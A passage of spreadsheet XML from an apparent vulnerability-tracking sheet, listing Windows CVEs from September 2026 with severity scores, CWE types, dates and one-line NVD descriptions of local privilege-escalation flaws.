    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69580</t>
        </is>
      </c>
      <c r="D542" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E542" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F542" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I542" s="5" t="inlineStr"/>
      <c r="J542" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K54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42" s="5" t="inlineStr"/>
      <c r="M542" s="5" t="inlineStr"/>
      <c r="N542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O542" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P542" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q542" s="5" t="inlineStr"/>
      <c r="R542" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S542" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69580</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69582</t>
        </is>
      </c>
      <c r="D543" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E543" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F543" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I543" s="5" t="inlineStr"/>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr"/>
      <c r="L543" s="5" t="inlineStr"/>
      <c r="M543" s="5" t="inlineStr"/>
      <c r="N543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O543" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P543" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q543" s="5" t="inlineStr"/>
      <c r="R543" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S543" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69582</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69583</t>
        </is>
      </c>
      <c r="D544" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E544" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F544" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G544" s="5" t="inlineStr"/>
      <c r="H544" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I544" s="5" t="inlineStr"/>
      <c r="J544" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K54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44" s="5" t="inlineStr"/>
      <c r="M544" s="5" t="inlineStr"/>
      <c r="N544" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O544" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P544" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q544" s="5" t="inlineStr"/>
      <c r="R544" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S544" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69584</t>
        </is>
      </c>
      <c r="D545" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E545" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F545" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G545" s="5" t="inlineStr"/>
      <c r="H545" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I545" s="5" t="inlineStr"/>
      <c r="J545" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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5" s="5" t="inlineStr"/>
      <c r="M545" s="5" t="inlineStr"/>
      <c r="N545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O545" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P545" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q545" s="5" t="inlineStr"/>
      <c r="R545" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S545" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69585</t>
        </is>
      </c>
      <c r="D546" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E546" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F546" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I546" s="5" t="inlineStr"/>
      <c r="J546" s="5" t="inlineStr"/>
      <c r="K546" s="5" t="inlineStr"/>
      <c r="L546" s="5" t="inlineStr"/>
      <c r="M546" s="5" t="inlineStr"/>
      <c r="N546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O546" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P546" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q546" s="5" t="inlineStr"/>
      <c r="R546" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="S546" s="5" t="inlineStr">
        <is>
          <t>Incorrect type conversion or cast in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69585</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69589</t>
        </is>
      </c>
      <c r="D547" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E547" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F547" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G547" s="5" t="inlineStr"/>
      <c r="H547" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I547" s="5" t="inlineStr"/>
      <c r="J547" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K54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47" s="5" t="inlineStr"/>
      <c r="M547" s="5" t="inlineStr"/>
      <c r="N547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O547" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P547" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q547" s="5" t="inlineStr"/>
      <c r="R547" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S547" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69592</t>
        </is>
      </c>
      <c r="D548" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E548" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F548" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G548" s="5" t="inlineStr"/>
      <c r="H548" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I548" s="5" t="inlineStr"/>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr"/>
      <c r="L548" s="5" t="inlineStr"/>
      <c r="M548" s="5" t="inlineStr"/>
      <c r="N548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O548" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P548" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q548" s="5" t="inlineStr"/>
      <c r="R548" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S548" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69592</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69593</t>
        </is>
      </c>
      <c r="D549" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E549" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F549" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I549" s="5" t="inlineStr"/>
      <c r="J549" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K54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49" s="5" t="inlineStr"/>
      <c r="M549" s="5" t="inlineStr"/>
      <c r="N549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O549" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P549" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q549" s="5" t="inlineStr"/>
      <c r="R549" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S549" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69594</t>
        </is>
      </c>
      <c r="D550" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E550" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F550" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I550" s="5" t="inlineStr"/>
      <c r="J550" s="5" t="inlineStr"/>
      <c r="K550" s="5" t="inlineStr"/>
      <c r="L550" s="5" t="inlineStr"/>
      <c r="M550" s="5" t="inlineStr"/>
      <c r="N550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O550" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P550" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q550" s="5" t="inlineStr"/>
      <c r="R550" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S550" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69594</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69604</t>
        </is>
      </c>
      <c r="D551" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E551" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F551" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G551" s="5" t="inlineStr"/>
      <c r="H551" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I551" s="5" t="inlineStr"/>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr"/>
      <c r="L551" s="5" t="inlineStr"/>
      <c r="M551" s="5" t="inlineStr"/>
      <c r="N551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O551" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P551" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q551" s="5" t="inlineStr"/>
      <c r="R551" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S551" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69604</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69608</t>
        </is>
      </c>
      <c r="D552" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E552" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F552" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G552" s="5" t="inlineStr"/>
      <c r="H552" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I552" s="5" t="inlineStr"/>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr"/>
      <c r="L552" s="5" t="inlineStr"/>
      <c r="M552" s="5" t="inlineStr"/>
      <c r="N552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O552" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P552" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q552" s="5" t="inlineStr"/>
      <c r="R552" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S552" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69608</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69612</t>
        </is>
      </c>
      <c r="D553" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E553" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F553" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I553" s="5" t="inlineStr"/>
      <c r="J553" s="5" t="inlineStr"/>
      <c r="K553" s="5" t="inlineStr"/>
      <c r="L553" s="5" t="inlineStr"/>
      <c r="M553" s="5" t="inlineStr"/>
      <c r="N553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O553" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P553" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q553" s="5" t="inlineStr"/>
      <c r="R553" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="S553" s="5" t="inlineStr">
        <is>
          <t>Absolute path traversal in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69612</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69685</t>
        </is>
      </c>
      <c r="D554" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E554" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F554" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G554" s="5" t="inlineStr"/>
      <c r="H554" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I554" s="5" t="inlineStr"/>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr"/>
      <c r="L554" s="5" t="inlineStr"/>
      <c r="M554" s="5" t="inlineStr"/>
      <c r="N554" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O554" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P554" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q554" s="5" t="inlineStr"/>
      <c r="R554" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S554" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69685</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69687</t>
        </is>
      </c>
      <c r="D555" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E555" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F555" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G555" s="5" t="inlineStr"/>
      <c r="H555" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I555" s="5" t="inlineStr"/>
      <c r="J555" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K55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55" s="5" t="inlineStr"/>
      <c r="M555" s="5" t="inlineStr"/>
      <c r="N555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O555" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P555" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q555" s="5" t="inlineStr"/>
      <c r="R555" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S555" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69691</t>
        </is>
      </c>
      <c r="D556" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E556" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F556" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G556" s="5" t="inlineStr"/>
      <c r="H556" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I556" s="5" t="inlineStr"/>
      <c r="J556" s="5" t="inlineStr"/>
      <c r="K556" s="5" t="inlineStr"/>
      <c r="L556" s="5" t="inlineStr"/>
      <c r="M556" s="5" t="inlineStr"/>
      <c r="N556" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O556" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P556" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q556" s="5" t="inlineStr"/>
      <c r="R556" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S556" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69691</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69707</t>
        </is>
      </c>
      <c r="D557" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E557" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F557" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I557" s="5" t="inlineStr"/>
      <c r="J557" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K55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57" s="5" t="inlineStr"/>
      <c r="M557" s="5" t="inlineStr"/>
      <c r="N557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O557" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P557" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q557" s="5" t="inlineStr"/>
      <c r="R557" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S557" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69709</t>
        </is>
      </c>
      <c r="D558" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E558" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F558" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G558" s="5" t="inlineStr"/>
      <c r="H558" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I558" s="5" t="inlineStr"/>
      <c r="J558" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K55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58" s="5" t="inlineStr"/>
      <c r="M558" s="5" t="inlineStr"/>
      <c r="N558" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O558" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P558" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q558" s="5" t="inlineStr"/>
      <c r="R558" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S558" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69709</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69720</t>
        </is>
      </c>
      <c r="D559" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E559" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F559" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G559" s="5" t="inlineStr"/>
      <c r="H559" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I559" s="5" t="inlineStr"/>
      <c r="J559" s="5" t="inlineStr"/>
      <c r="K559" s="5" t="inlineStr"/>
      <c r="L559" s="5" t="inlineStr"/>
      <c r="M559" s="5" t="inlineStr"/>
      <c r="N559" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O559" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
